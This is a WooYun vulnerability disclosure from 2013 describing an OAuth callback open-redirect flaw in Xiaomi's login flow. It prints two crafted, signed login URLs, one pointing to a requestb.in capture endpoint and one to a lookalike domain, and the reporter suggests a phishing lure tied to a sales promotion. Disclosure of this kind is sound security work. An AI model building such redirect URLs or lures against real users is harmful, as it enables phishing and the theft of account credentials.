当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040046

漏洞标题:小米某账户登录页面oauth缺陷(可钓鱼)

相关厂商:小米科技

漏洞作者: libmaru

提交时间:2013-10-17 15:40

修复时间:2013-10-22 15:40

公开时间:2013-10-22 15:40

漏洞类型:URL跳转

危害等级:中

自评Rank:7

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-17: 细节已通知厂商并且等待厂商处理中
2013-10-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

登录成功后重定向到callback指定的网址,callback已经加了sign验证,但是存在接口可以提交URL给sign

详细说明:

求米2S标准版的F码~谢谢
http://order.xiaomi.com/site/loginurl 验证不严
例1:
利用
http://order.xiaomi.com/site/loginurl?followup=http://requestb.in/1kd0b981?.xiaomi.com
构造出
https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Forder.xiaomi.com%2Flogin%2Fcallback%3Ffollowup%3Dhttp%253A%252F%252Frequestb.in%252F1kd0b981%253F.xiaomi.com%26sign%3DMWFiNDVhOGNiNWUyYWE3NjMxNDFiYjA3MzE0Yjc1Zjg0OWZiMjQ1Ng%2C%2C&sid=eshop
例2:
利用
http://order.xiaomi.com/site/loginurl?followup=http://www.xiaomi.com.example.com
构造出
https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Forder.xiaomi.com%2Flogin%2Fcallback%3Ffollowup%3Dhttp%253A%252F%252Fwww.xiaomi.com.example.com%26sign%3DYTBjMDVhN2ZlYjg0OGQ3MWRiYTg3M2NmMTg3NzA5MDViYzkyMWNmYw%2C%2C&sid=eshop
借着活动的宣传,打着保证抢到之类的旗号一定能掉到好多好多人 > <

漏洞证明:

修复方案:

http://order.xiaomi.com/site/loginurl 验证不严,这个不应该
https://account.xiaomi.com/pass/serviceLogin 只查sign不查url也不合理,白名单几个域名又不累

版权声明:转载请注明来源 libmaru@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-10-22 15:40

厂商回复:

最新状态:

暂无